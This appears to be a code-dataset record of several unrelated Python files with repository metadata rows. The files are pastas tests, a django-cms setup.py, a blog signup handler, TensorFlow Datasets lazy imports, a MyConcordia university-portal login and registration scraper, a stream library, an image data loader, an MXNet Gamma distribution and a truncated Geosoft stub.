def test_project_get_nearest_stresses():
pr = test_project_add_stresses()
pr.get_nearest_stresses(kind="prec", n=2)
def test_project_dump_to_file():
pr = test_project_solve_models()
pr.to_file("testproject.pas")
return
def test_project_load_from_file():
pr = ps.io.load("testproject.pas")
return pr
def test_project_get_oseries_metadata():
pr = test_project_add_oseries()
return pr.get_oseries_metadata(["heads"], ["x", "y"])
def test_project_get_oseries_settings():
pr = test_project_add_oseries()
return pr.get_oseries_settings(["heads"], ["tmin", "tmax", "freq"])
def test_project_get_metadata():
pr = test_project_add_stresses()
return pr.get_metadata()
def test_project_get_file_info():
pr = test_project_add_oseries()
return pr.get_file_info()
def test_project_update_model_series():
pr = test_project_solve_models()
pr.update_model_series()
return
| mit | -4,870,507,018,814,844,000 | 22.639344 | 78 | 0.635576 | false | 3.097744 | true | false | false |
DylannCordel/django-cms | setup.py | 2 | 1526 | from setuptools import setup, find_packages
import os
import cms
CLASSIFIERS = [
'Development Status :: 5 - Production/Stable',
'Environment :: Web Environment',
'Framework :: Django',
'Intended Audience :: Developers',
'License :: OSI Approved :: BSD License',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Topic :: Internet :: WWW/HTTP :: Dynamic Content',
'Topic :: Software Development',
'Topic :: Software Development :: Libraries :: Application Frameworks',
"Programming Language :: Python :: 2.6",
"Programming Language :: Python :: 2.7",
"Programming Language :: Python :: 3.3",
"Programming Language :: Python :: 3.4",
]
setup(
author="Patrick Lauber",
author_email="[email protected]",
name='django-cms',
version=cms.__version__,
description='An Advanced Django CMS',
long_description=open(os.path.join(os.path.dirname(__file__), 'README.rst')).read(),
url='https://www.django-cms.org/',
license='BSD License',
platforms=['OS Independent'],
classifiers=CLASSIFIERS,
install_requires=[
'Django>=1.6,<1.8',
'django-classy-tags>=0.5',
'html5lib<0.9999',
'django-treebeard==3.0',
'django-sekizai>=0.7',
'djangocms-admin-style'
],
extras_require={
'south': ['south>=1.0.0'],
},
packages=find_packages(exclude=["project", "project.*"]),
include_package_data=True,
zip_safe=False,
test_suite='runtests.main',
)
| bsd-3-clause | 3,222,477,265,272,711,700 | 30.142857 | 88 | 0.619921 | false | 3.740196 | false | true | false |
ashutoshpurushottam/wishper-blog | handlers/signup.py | 1 | 2578 | from main import BaseHandler
from models.user import store_blog_user
from base.helpers import validate
from base.helpers import make_secure_val
import time
class SignupHandler(BaseHandler):
"""
Handles form validation, checks if the username and/or email id already exists.
In case form is submitted with proper inputs it redirects user to the welcome
page and adds user to the db
"""
def get(self):
self.render("signup.html")
def post(self):
# obtain input values from the form
input_username = self.request.get('username')
input_password = self.request.get('password')
input_verify = self.request.get('verify')
input_email = self.request.get('email')
validate_response = validate(input_username,
input_password,
input_verify,
input_email)
# if validate_response dictionary is empty, the user input values are valid
# (except that the username/email may already be taken which need to be tested)
if validate_response:
username_error = validate_response.get('username_error', "")
password_error = validate_response.get('password_error', "")
verify_error = validate_response.get('verify_error', "")
email_error = validate_response.get('email_error', "")
self.render("signup.html",
username_error=username_error,
password_error=password_error,
verify_error=verify_error,
email_error=email_error,
input_username=input_username,
input_email=input_email)
else:
store_user_response = store_blog_user(input_username,
input_password,
input_email)
if store_user_response:
self.render("signup.html",
store_user_error=store_user_response,
input_username=input_username,
input_email=input_email)
# user successfully stored in db
else:
user_cookie = make_secure_val(str(input_username))
self.response.headers.add_header(
"Set-Cookie", "user=%s; Path=/" %
user_cookie)
time.sleep(0.1)
self.redirect('/')
| apache-2.0 | 2,149,645,121,340,756,500 | 42.694915 | 87 | 0.537626 | false | 4.976834 | false | false | false |
tensorflow/datasets | tensorflow_datasets/core/lazy_imports_lib.py | 1 | 5332 | # coding=utf-8
# Copyright 2021 The TensorFlow Datasets Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Lazy imports for heavy dependencies."""
import functools
import importlib
from typing import TypeVar
from tensorflow_datasets.core.utils import py_utils as utils
_Fn = TypeVar("_Fn")
def _try_import(module_name):
"""Try importing a module, with an informative error message on failure."""
try:
mod = importlib.import_module(module_name)
return mod
except ImportError as e:
err_msg = ("Failed importing {name}. This likely means that the dataset "
"requires additional dependencies that have to be "
"manually installed (usually with `pip install {name}`). See "
"setup.py extras_require.").format(name=module_name)
utils.reraise(e, suffix=err_msg)
class LazyImporter(object):
"""Lazy importer for heavy dependencies.
Some datasets require heavy dependencies for data generation. To allow for
the default installation to remain lean, those heavy dependencies are
lazily imported here.
"""
@utils.classproperty
@classmethod
def apache_beam(cls):
return _try_import("apache_beam")
@utils.classproperty
@classmethod
def bs4(cls):
return _try_import("bs4")
@utils.classproperty
@classmethod
def crepe(cls):
return _try_import("crepe")
@utils.classproperty
@classmethod
def cv2(cls):
return _try_import("cv2")
@utils.classproperty
@classmethod
def gcld3(cls):
return _try_import("gcld3") # pylint: disable=unreachable
@utils.classproperty
@classmethod
def h5py(cls):
return _try_import("h5py")
@utils.classproperty
@classmethod
def langdetect(cls):
return _try_import("langdetect")
@utils.classproperty
@classmethod
def librosa(cls):
return _try_import("librosa")
@utils.classproperty
@classmethod
def lxml(cls):
return _try_import("lxml")
@utils.classproperty
@classmethod
def matplotlib(cls):
_try_import("matplotlib.pyplot")
return _try_import("matplotlib")
@utils.classproperty
@classmethod
def mwparserfromhell(cls):
return _try_import("mwparserfromhell")
@utils.classproperty
@classmethod
def networkx(cls):
return _try_import("networkx")
@utils.classproperty
@classmethod
def nltk(cls):
return _try_import("nltk")
@utils.classproperty
@classmethod
def pandas(cls):
return _try_import("pandas")
@utils.classproperty
@classmethod
def PIL_Image(cls): # pylint: disable=invalid-name
# TiffImagePlugin need to be activated explicitly on some systems
# https://github.com/python-pillow/Pillow/blob/5.4.x/src/PIL/Image.py#L407
_try_import("PIL.TiffImagePlugin")
return _try_import("PIL.Image")
@utils.classproperty
@classmethod
def PIL_ImageDraw(cls): # pylint: disable=invalid-name
return _try_import("PIL.ImageDraw")
@utils.classproperty
@classmethod
def pretty_midi(cls):
return _try_import("pretty_midi")
@utils.classproperty
@classmethod
def pycocotools(cls):
return _try_import("pycocotools.mask")
@utils.classproperty
@classmethod
def pydub(cls):
return _try_import("pydub")
@utils.classproperty
@classmethod
def scipy(cls):
_try_import("scipy.io")
_try_import("scipy.io.wavfile")
_try_import("scipy.ndimage")
return _try_import("scipy")
@utils.classproperty
@classmethod
def skimage(cls):
_try_import("skimage.color")
_try_import("skimage.filters")
try:
_try_import("skimage.external.tifffile")
except ImportError:
pass
return _try_import("skimage")
@utils.classproperty
@classmethod
def tifffile(cls):
return _try_import("tifffile")
@utils.classproperty
@classmethod
def tensorflow_data_validation(cls):
return _try_import("tensorflow_data_validation")
@utils.classproperty
@classmethod
def tensorflow_io(cls):
return _try_import("tensorflow_io")
@utils.classproperty
@classmethod
def tldextract(cls):
return _try_import("tldextract")
@utils.classproperty
@classmethod
def os(cls):
"""For testing purposes only."""
return _try_import("os")
@utils.classproperty
@classmethod
def test_foo(cls):
"""For testing purposes only."""
return _try_import("test_foo")
lazy_imports = LazyImporter # pylint: disable=invalid-name
def beam_ptransform_fn(fn: _Fn) -> _Fn:
"""Lazy version of `@beam.ptransform_fn`."""
lazy_decorated_fn = None
@functools.wraps(fn)
def decorated(*args, **kwargs):
nonlocal lazy_decorated_fn
# Actually decorate the function only the first time it is called
if lazy_decorated_fn is None:
lazy_decorated_fn = lazy_imports.apache_beam.ptransform_fn(fn)
return lazy_decorated_fn(*args, **kwargs)
return decorated
| apache-2.0 | -587,575,874,370,292,600 | 23.685185 | 78 | 0.700863 | false | 3.659574 | false | false | false |
squarebracket/star | backends/myconcordia.py | 1 | 19029 | from registrator.models import StudentRecord
from user_stuff.models import StarUser, Student
from bs4 import BeautifulSoup, Tag
from cookielib import CookieJar
import urllib
import urllib2
import urlparse
from StringIO import StringIO
import gzip
import re
from uni_info.models import Semester, Section, Course
from registrator.models import StudentRecord, StudentRecordEntry
class MyConcordiaBackend(object):
def __init__(self):
pass
@staticmethod
def authenticate(username=None, password=None, session=None):
reg = MyConcordiaAccessor()
if not reg.login(username, password):
return None
#implicit else:
student = reg.get_user_status()
if student:
try:
user = Student.objects.get(username=username)
except Student.DoesNotExist:
user = Student(username=username,
password='get from myconcordiaacc',
date_of_birth='1970-01-01')
user.save()
stud = StudentRecord.objects.get_or_create(
student=user,
_standing='Good'
)
stud_rec = reg.get_student_record()
stud_info = stud_rec.student_info
user.date_of_birth = stud_info['date_of_birth']
user.first_name = stud_info['first_name']
user.last_name = stud_info['last_name']
user.student_identifier = stud_info['id']
user.gender = stud_info['gender']
user.save()
else:
try:
user = StarUser.objects.get(username=username)
except StarUser.DoesNotExist:
user = StarUser(username=username, password='get from myconcordiaacc',
date_of_birth='1970-01-01')
user.save()
session['reg'] = reg
return user
@staticmethod
def get_user(user_id):
try:
return StarUser.objects.get(pk=user_id)
except StarUser.DoesNotExist:
return None
SEMESTER_MAPPER = {
'/2': Semester.FALL,
'/3': Semester.YEAR_LONG,
'/4': Semester.WINTER,
'/1': Semester.SUMMER_1
}
SEMESTER_REVERSE_MAPPER = {
Semester.FALL: '2',
Semester.YEAR_LONG: '3',
Semester.WINTER: '4'
}
class MyConcordiaAccessor():
LOGIN_URL = 'https://my.concordia.ca/psp/upprpr9/?cmd=login&languageCd=ENG'
STUDENT_RECORD_LINK_TEXT = 'Display the student record.'
STUDENT_RECORD_URL = 'https://genesis.concordia.ca/Transcript/PortalStudentRecord.aspx?token=%s'
REGISTRATION_URL = 'https://regsis.concordia.ca/portalRegora/undergraduate/wr150.asp?token=%s'
REGISTER_FOR_COURSE_URL = 'https://regsis.concordia.ca/portalRegora/undergraduate/wr225.asp'
CONFIRM_REGISTER_FOR_COURSE_URL = 'https://regsis.concordia.ca/portalRegora/undergraduate/wr300.asp'
CHANGE_SECTION_URL = 'https://regsis.concordia.ca/portalRegora/undergraduate/wr500.asp'
ACADEMIC_LINK = 'Academic'
REGISTRATION_NETLOC = 'regsis.concordia.ca'
LOGIN_FAILURE_URL = 'https://my.concordia.ca/psp/portprod/?cmd=login&languageCd=ENG'
DEFAULT_HEADERS = [
('Host', 'my.concordia.ca'),
('Accept', 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8'),
('Accept-Encoding', 'gzip,deflate,sdch'),
('Accept-Language', 'en-GB,en;q=0.8,fr;q=0.6,en-US;q=0.4,fr-CA;q=0.2'),
('Origin', 'https://www.myconcordia.ca'),
('Referer', 'https://www.myconcordia.ca/'),
('User-Agent', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.57 Safari/537.36')
]
def __init__(self):
self.cj = CookieJar()
self.opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(self.cj))
self.opener.addheaders = [
('Host', 'my.concordia.ca:443'),
('Accept', 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8'),
('Accept-Encoding', 'gzip,deflate,sdch'),
('Accept-Language', 'en-GB,en;q=0.8,fr;q=0.6,en-US;q=0.4,fr-CA;q=0.2'),
('Origin', 'https://www.myconcordia.ca'),
('Referer', 'https://www.myconcordia.ca/'),
('User-Agent', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.57 Safari/537.36')
]
self.site_tree = None
self.student_record = None
self.external_token = None
self.registration_id = None
self.currently_at = None
self.current_bs = None
def set_headers(self):
if self.currently_at:
parse = urlparse.urlparse(self.currently_at)
origin = parse[0] + '://' + parse[1]
self.opener.addheaders[0] = ('Host', parse[1])
self.opener.addheaders[4] = ('Origin', origin)
self.opener.addheaders[5] = ('Referer', self.currently_at)
def login(self, userid, password):
payload_data = {
'resource': '/content/cspace/en/login.html',
'_charset_': 'UTF-8',
'userid': userid,
'pwd': password
}
content = self.get_url(self.LOGIN_URL, payload_data)
if 'PS_TOKEN' in self.cj._cookies['.concordia.ca']['/']:
# we authenticated properly
self.site_tree = BeautifulSoup(content)
return True
else:
# we didn't authenticate properly, so we have to reset the object
self.__init__()
return False
def get_url(self, url, payload_data=None):
# Todo: make this more robust?
# Todo: also add an error condition for if an absolute URL is never supplied
if url[:4] != 'http':
url = urlparse.urljoin(self.currently_at, url)
self.set_headers()
if payload_data:
data = urllib.urlencode(payload_data)
response = self.opener.open(url, data)
else:
response = self.opener.open(url)
self.currently_at = response.geturl()
if response.info().get('Content-Encoding') == 'gzip':
return unzip(response.read())
else:
return response.read()
def set_token(self):
m = re.search(r'token=([a-zA-Z0-9]*)', self.currently_at)
if m.group(1):
self.external_token = m.group(1)
else:
raise Exception
def get_url_with_token(self, url, payload_data=None):
return self.get_url(url % self.external_token, payload_data)
def get_url_with_registration_id(self, url, payload_data={}):
payload_data['Id'] = self.registration_id
return self.get_url(url, payload_data)
def get_content(self, url, payload_data=None):
bs = BeautifulSoup(self.get_url(url, payload_data))
return BeautifulSoup(self.get_url(bs.find('frame', title='Main Content')['src']))
def navigate_content(self, url, payload_data=None):
return BeautifulSoup(self.get_url(url, payload_data))
def get_nav_link_by_name(self, link):
try:
return self.site_tree.find('a', attrs={'name': link})['href']
except TypeError:
return None
def get_nav_link_by_title(self, link):
try:
return self.site_tree.find('a', title=link)['href']
except TypeError:
return None
def get_content_link_by_title(self, content, link):
return content.find('a', title=link)['href']
def submit_form(self, content, form_id=None, extra_data=None, force_url=None):
payload = {}
if form_id:
form = content.find('form', id=form_id)
hiddens = form.find_all('input', type='hidden')
else:
hiddens = content.find_all('input', type='hidden')
for el in hiddens:
payload[el.attrs['name']] = el['value']
if extra_data:
for data in extra_data.iteritems():
payload[data[0]] = data[1]
if force_url:
url = force_url
else:
url = form['action']
return self.navigate_content(url, payload)
def in_section(self, section):
if section == 'registration':
return self.netloc == self.REGISTRATION_NETLOC
@property
def netloc(self):
return urlparse.urlparse(self.currently_at)[1]
def get_student_record(self):
return ConcordiaStudentRecord(self.get_url_with_token(self.STUDENT_RECORD_URL))
# link = self.ACADEMIC_LINK
# content = self.get_content(self.get_nav_link_by_title(link))
# link = self.STUDENT_RECORD_LINK_TEXT
# self.student_record = self.get_content(self.get_content_link_by_title(content, link))
def goto_registration(self):
link = 'Registration'
content = self.get_content(self.get_nav_link_by_title(link))
link = 'Undergraduate Registration'
content = self.get_content(self.get_content_link_by_title(content, link))
content = self.navigate_content(content.meta['content'][6:])
form_id = 'form2' # Continue
self.current_bs = self.submit_form(content, form_id)
def get_registration_id(self):
content = BeautifulSoup(self.get_url(self.REGISTRATION_URL))
self.registration_id = content.find('input', type='hidden', attrs={'name': 'Id'})['value']
def register_for_course(self, section):
if not self.registration_id:
self.get_registration_id()
section_tree = section.section_tree_to_here
payload_data1 = {
'CourName': section.course.course_letters,
'CourNo': section.course.course_numbers,
'Sess': SEMESTER_REVERSE_MAPPER[section.semester_year.period],
'CatNum': '12345',
'MainSec': section_tree[0],
'RelSec1': '',
'RelSec2': '',
}
payload_data2 = {
'cournam': section.course.course_letters,
'courno': section.course.course_numbers,
'acyear': section.semester_year.year,
'session': SEMESTER_REVERSE_MAPPER[section.semester_year.period],
'mainsec': section_tree[0],
'relsec1': '',
'relsec2': '',
'subses': '',
'catalog': '12345',
}
if 1 in section_tree:
payload_data1['RelSec1'] = section_tree[1]
payload_data2['relsec1'] = section_tree[1]
if 2 in section_tree:
payload_data2['RelSec2'] = section_tree[2]
payload_data2['relsec2'] = section_tree[2]
# TODO: add check for confirmation?
response = self.get_url_with_registration_id(self.REGISTER_FOR_COURSE_URL, payload_data1)
response = self.get_url_with_registration_id(self.CONFIRM_REGISTER_FOR_COURSE_URL, payload_data2)
def change_section(self, from_section, to_section):
from_section_tree = from_section.section_tree_to_here
to_section_tree = to_section.section_tree_to_here
payload_data = {
'cournam': to_section.course.course_letters,
'courno': to_section.course.course_numbers,
'acyear': to_section.semester_year.year,
'toSession': SEMESTER_REVERSE_MAPPER[to_section.semester_year.period],
'mainsec': to_section_tree[0],
'relsec1': '',
'relsec2': '',
'subses': '',
'catalog': '12345',
'fmainsec': from_section_tree[0],
'frelsec1': '',
'frelsec2': '',
'fSession': SEMESTER_REVERSE_MAPPER[from_section.semester_year.period],
'fsubses': '',
}
if 1 in from_section_tree:
payload_data['frelsec1'] = from_section_tree[1]
payload_data['relsec1'] = to_section_tree[1]
if 2 in from_section_tree:
payload_data['frelsec2'] = from_section_tree[2]
payload_data['relsec2'] = to_section_tree[2]
response = self.get_url_with_registration_id(self.CHANGE_SECTION_URL, payload_data)
def add_course(self, sec_info):
if not self.registration_id:
self.get_registration_id()
payload_data = {
'CourName': sec_info['']
}
def get_user_status(self):
# status_link = self.get_nav_link_by_name('CU_ADDISPLAY')
# content = self.get_content(status_link)
l = urlparse.urljoin(self.currently_at.replace('psp', 'psc'), 'WEBLIB_CONCORD.CU_PUBLIC_INFO.FieldFormula.IScript_ADDisplay')
content = BeautifulSoup(self.get_url('https://my.concordia.ca/psc/upprpr9/EMPLOYEE/EMPL/s/WEBLIB_CONCORD.CU_PUBLIC_INFO.FieldFormula.IScript_ADDisplay'))
self.set_token()
stud_access = content.find('li').get_text()
student = False
m = re.match('Undergraduate/Graduate Student Access enabled', stud_access)
if m:
student = True
return student
def parse_registration_response(self, response):
soup = BeautifulSoup(response)
status = soup.find('table', class_='MAIN').find('td', bgcolor='#000080').font.b.string.strip()
if status == 'Course Registration Denied':
table = soup.find('table', border=0)
return False, table
class ConcordiaStudentRecord(object):
STUDENT_RECORD_REGEX = r'([A-Z]{4}) (\d{3}[A-Z]?) (\/\d) ([A-Z0-9]*) (.*) (\d\.\d\d) ([A-Z]*[-+]?)? ([A-Z]*) \(?(\d\.\d)?\)? (\d.\d\d)? (\d*) (\d\.\d\d)? (.*)'
def __init__(self, html):
self.html = html
self.soup = BeautifulSoup(html)
self.student = None
self.student_info = None
self.student_record = None
self.main_div = self.soup.find('div', id='SIMSPrintSection')
self.student_info_soup = self.main_div.table.tr.nextSibling
self.parse_student_info()
degree_req_bs = self.student_info_soup.nextSibling
self.degree_reqs = degree_req_bs.string
exemption_bs = degree_req_bs.nextSibling
self.exemptions = exemption_bs.string
table_of_takens_bs = exemption_bs.nextSibling.table
current_row = table_of_takens_bs.tr
while current_row:
current_text = current_row.get_text()
if 'ACADEMIC YEAR' in current_text:
# TODO: replace with regex
current_year = current_text[14:18]
elif 'SUMMER' in current_text or 'FALL-WINTER' in current_text:
# we can ignore it
pass
#self.current_semester = Semester.objects.get(year=current_year, period=Semester.SUMMER_1)
elif 'Grade/Notation/GPA' in current_text:
pass
else:
current_text = gen_string_from_current_row(current_row)
m = re.match(self.STUDENT_RECORD_REGEX, current_text)
if m:
course_letters = m.group(1)
course_numbers = m.group(2)
semester = m.group(3)
sem = Semester.objects.get(year=current_year, period=SEMESTER_MAPPER[semester])
sec_name = m.group(4)
course_name = m.group(5)
course_credits = m.group(6)
grade_received = m.group(7)
notation = m.group(8)
gpa_received = m.group(9)
class_avg = m.group(10)
class_size = m.group(11)
credits_received = m.group(12)
other = m.group(13)
course = Course.objects.get(course_letters=course_letters, course_numbers=course_numbers)
try:
sec = Section.objects.get(course=course, semester_year=sem, name=sec_name)
print "%s %s Section %s found" % (course_letters, course_numbers, sec_name)
except Section.DoesNotExist:
sec = Section(course=course, semester_year=sem, name=sec_name, sec_type=Section.LECTURE,
days='')
print "%s %s Section %s not found" % (course_letters, course_numbers, sec_name)
sec.save()
try:
rec_ent = StudentRecordEntry.objects.get(student_record=self.student_record, section=sec)
print "SRE %s %s Section %s found" % (course_letters, course_numbers, sec_name)
except StudentRecordEntry.DoesNotExist:
rec_ent = StudentRecordEntry(student_record=self.student_record, section=sec)
print "SRE %s %s Section %s not found" % (course_letters, course_numbers, sec_name)
if int(current_year) <= get_current_school_year() and gpa_received is not None:
rec_ent.state = StudentRecordEntry.COMPLETED
rec_ent.result_grade = gpa_received
else:
rec_ent.state = StudentRecordEntry.REGISTERED
rec_ent.save()
# print gen_string_from_current_row(current_row)
current_row = current_row.nextSibling
#return table_blah
def parse_student_info(self):
id_row = self.student_info_soup.table.tr
id_num = id_row.td.b.get_text()
name_row = id_row.nextSibling
first_name, last_name = name_row.td.get_text().split(u'\xa0')
next_row = name_row.nextSibling
next_row = next_row.nextSibling
date_of_birth_text, sex = next_row.td.nextSibling.get_text().split(u'\xa0')
import datetime
dob = datetime.datetime.strptime(date_of_birth_text, '%d/%m/%y').date()
self.student_info = {
'id': id_num,
'first_name': first_name,
'last_name': last_name,
'date_of_birth': dob,
'gender': sex.strip(),
}
self.student = Student.objects.get(student_identifier=id_num)
self.student_record = StudentRecord.objects.get(student=self.student)
def unzip(gzipped_data):
buf = StringIO(gzipped_data)
unzipped = gzip.GzipFile(fileobj=buf)
return unzipped.read()
def gen_string_from_current_row(row):
b = []
for a in row.contents:
if type(a) is Tag:
# this sub is dangerous.... keep an eye out.
to_append = re.sub('[ ]{2,10}', ' ', a.get_text().strip())
b.append(to_append)
#keeping this section just in case it's needed for other faculties
#else:
# if a.strip() != u'':
# c = 'durr %s' % a.strip().replace(' ', ' ')
# b.append(c)
return ' '.join(b)
def get_current_school_year():
from datetime import date
now = date.today()
if now.month < 5: # previous actual year = school year
return now.year - 1
# else return current year
return now.year | gpl-2.0 | 5,778,534,104,969,647,000 | 39.489362 | 163 | 0.574859 | false | 3.571509 | false | false | false |
daviesjamie/spout | spout/streams.py | 1 | 3869 | import abc
class Stream(object):
"""
Abstract implementation of a data stream.
"""
__metaclass__ = abc.ABCMeta
def for_each(self, operation, limit=0, verbose=False):
"""
Applies the given Operation to each item in the stream. The Operation executes on the
items in the stream in the order that they appear in the stream.
If the limit is supplied, then processing of the stream will stop after that many items
have been processed.
"""
if limit != 0:
count = 0
while self.has_next():
operation.perform(self.next())
count += 1
if verbose:
print count
if count >= limit:
break
else:
while self.has_next():
operation.perform(self.next())
def filter(self, predicate):
"""
Transforms the stream by only keeping items that match the supplied predicate.
"""
return FilterStream(self, predicate)
def map(self, function):
"""
Transforms the stream by applying the supplied function to each item in the stream,
thus creating a new stream.
"""
return MapStream(self, function)
@abc.abstractmethod
def has_next(self):
"""
Tests to see if there are any items left in the stream to consume.
"""
pass
@abc.abstractmethod
def next(self):
"""
Fetches the next item in the stream.
"""
pass
class FilterStream(Stream):
"""
A stream created by applying a filter (in the form of a Predicate) to another stream.
"""
def __init__(self, source, predicate):
self.source = source
self.predicate = predicate
self.obj = None
def has_next(self):
if self.obj is not None:
return True
while self.source.has_next() and self.obj is None:
self.obj = self.source.next()
if not self.predicate.test(self.obj):
self.obj = None
return self.obj is not None
def next(self):
if not self.has_next():
raise Exception("Iteration has no more elements")
to_return = self.obj
self.obj = None
return to_return
class MapStream(Stream):
"""
A stream created by applying a Function to the elements in another stream.
"""
def __init__(self, source, function):
self.source = source
self.function = function
def has_next(self):
return self.source.has_next()
def next(self):
return self.function.apply(self.source.next())
class BufferedStream(Stream):
"""
Implementation of a Stream that uses a BufferedQueue as its internal buffer.
This class is designed for use with live data sources that may produce data faster than it
can be consumed, as the internal BufferedQueue will drop items that aren't consumed (i.e,
removed from the queue) fast enough.
"""
def __init__(self, buf):
self.buf = buf
self.connected = False
def register(self, item):
"""
Attempts to 'register' an item with the BufferedStream by offering it to the
BufferedQueue. Returns True if the item was successfully published to the stream, or False
if it wasn't.
"""
return self.buf.offer(item)
def connect(self):
"""
Opens the streaming connection to the data source (makes has_next() return True)
"""
self.connected = True
def disconnect(self):
"""
Closes the stream (by making has_next() return False)
"""
self.connected = False
def has_next(self):
return self.connected
def next(self):
return self.buf.take() | mit | 4,541,527,865,234,232,300 | 25.875 | 98 | 0.583872 | false | 4.600476 | false | false | false |
apoorva-sharma/deep-frame-interpolation | data_loader.py | 1 | 3243 | import numpy as np
from scipy import misc
import glob
from tensorflow.contrib.learn.python.learn.datasets import base
class DataSet(object):
def __init__(self, images, labels):
self._images = images
self._labels = labels
self._num_examples = images.shape[0]
self._epochs_completed = 0
self._index_in_epoch = 0
@property
def images(self):
return self._images
@property
def labels(self):
return self._labels
@property
def num_examples(self):
return self._num_examples
@property
def epochs_completed(self):
return self._epochs_completed
def next_batch(self, batch_size):
"""Return the next `batch_size` examples from this data set."""
start = self._index_in_epoch
self._index_in_epoch += batch_size
if self._index_in_epoch > self._num_examples:
# Finished epoch
self._epochs_completed += 1
# Shuffle the data
perm = np.arange(self._num_examples)
np.random.shuffle(perm)
self._images = self._images[perm]
self._labels = self._labels[perm]
# Start next epoch
start = 0
self._index_in_epoch = batch_size
assert batch_size <= self._num_examples
end = self._index_in_epoch
return self._images[start:end], self._labels[start:end]
def read_data_set(downsample_factor=1):
image_paths = glob.glob("./IMG/*.png")
image_paths.sort()
# [print(i) for i in image_paths]
train_inputs = []
train_targets = []
# load data into train_inputs/targets
for i in range(len(image_paths)-2):
before_target = 255-np.array(misc.imread(image_paths[i]))
target = 255-np.array(misc.imread(image_paths[i+1]))
after_target = 255-np.array(misc.imread(image_paths[i+2]))
if downsample_factor > 1:
before_target = before_target[::downsample_factor,::downsample_factor,:];
target = target[::downsample_factor,::downsample_factor,:];
after_target = after_target[::downsample_factor,::downsample_factor,:];
x = np.concatenate((before_target,after_target),axis = 2)
train_inputs.append(x)
train_targets.append(target)
train_inputs = np.array(train_inputs)
train_targets = np.array(train_targets)
print(train_inputs.shape)
## split into train, test, validation
dataset_size = len(train_inputs)
test_size = int(0.15*(dataset_size))
validation_size = test_size
# shuffle data
perm = np.arange(dataset_size)
np.random.shuffle(perm)
train_inputs = train_inputs[perm]
train_targets = train_targets[perm]
# split
validation_inputs = train_inputs[-validation_size:]
validation_targets = train_targets[-validation_size:]
test_inputs = train_inputs[-(validation_size+test_size):-validation_size]
test_targets = train_targets[-(validation_size+test_size):-validation_size]
train_inputs = train_inputs[:-(validation_size+test_size)]
train_targets = train_targets[:-(validation_size+test_size)]
print('Train size:', train_inputs.shape)
print('Test size:', test_inputs.shape)
print('Validation size:', validation_inputs.shape)
# package as tf.Datasets object and return
train = DataSet(train_inputs, train_targets)
validation = DataSet(validation_inputs, validation_targets)
test = DataSet(test_inputs, test_targets)
return base.Datasets(train=train, validation=validation, test=test)
if __name__ == '__main__':
read_data_set()
| mit | 3,691,239,741,978,047,000 | 25.365854 | 76 | 0.708295 | false | 3.079772 | true | false | false |
leezu/mxnet | python/mxnet/gluon/probability/distributions/gamma.py | 5 | 3721 | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
# coding: utf-8
# pylint: disable=wildcard-import
"""Gamma Distribution."""
__all__ = ['Gamma']
from .exp_family import ExponentialFamily
from .constraint import Real, Positive
from .utils import getF, sample_n_shape_converter, gammaln, digamma
class Gamma(ExponentialFamily):
r"""Create a Gamma distribution object.
Parameters
----------
shape : Tensor or scalar
shape parameter of the distribution, often represented by `k` or `\alpha`
scale : Tensor or scalar, default 1
scale parameter of the distribution, often represented by `\theta`,
`\theta` = 1 / `\beta`, where `\beta` stands for the rate parameter.
F : mx.ndarray or mx.symbol.numpy._Symbol or None
Variable recording running mode, will be automatically
inferred from parameters if declared None.
"""
# pylint: disable=abstract-method
# TODO: Implement implicit reparameterization gradient for Gamma.
has_grad = False
support = Real()
arg_constraints = {'shape': Positive(), 'scale': Positive()}
def __init__(self, shape, scale=1.0, F=None, validate_args=None):
_F = F if F is not None else getF(shape, scale)
self.shape = shape
self.scale = scale
super(Gamma, self).__init__(
F=_F, event_dim=0, validate_args=validate_args)
def log_prob(self, value):
if self._validate_args:
self._validate_samples(value)
F = self.F
log_fn = F.np.log
lgamma = gammaln(F)
# alpha (concentration)
a = self.shape
# beta (rate)
b = 1 / self.scale
return a * log_fn(b) + (a - 1) * log_fn(value) - b * value - lgamma(a)
def broadcast_to(self, batch_shape):
new_instance = self.__new__(type(self))
F = self.F
new_instance.shape = F.np.broadcast_to(self.shape, batch_shape)
new_instance.scale = F.np.broadcast_to(self.scale, batch_shape)
super(Gamma, new_instance).__init__(F=F,
event_dim=self.event_dim,
validate_args=False)
new_instance._validate_args = self._validate_args
return new_instance
def sample(self, size=None):
return self.F.np.random.gamma(self.shape, 1, size) * self.scale
def sample_n(self, size=None):
return self.F.np.random.gamma(self.shape, 1, sample_n_shape_converter(size)) * self.scale
@property
def mean(self):
return self.shape * self.scale
@property
def variance(self):
return self.shape * (self.scale ** 2)
def entropy(self):
F = self.F
lgamma = gammaln(F)
dgamma = digamma(F)
return (self.shape + F.np.log(self.scale) + lgamma(self.shape) +
(1 - self.shape) * dgamma(self.shape))
@property
def _natural_params(self):
return (self.shape - 1, -1 / self.scale)
| apache-2.0 | -6,705,765,177,642,580,000 | 35.480392 | 97 | 0.633701 | false | 3.828189 | false | false | false |
GeosoftInc/gxpy | geosoft/gxapi/GXMAPL.py | 1 | 4787 | ### extends 'class_empty.py'
### block ClassImports
# NOTICE: Do not edit anything here, it is generated code
from . import gxapi_cy
from geosoft.gxapi import GXContext, float_ref, int_ref, str_ref
### endblock ClassImports
### block Header
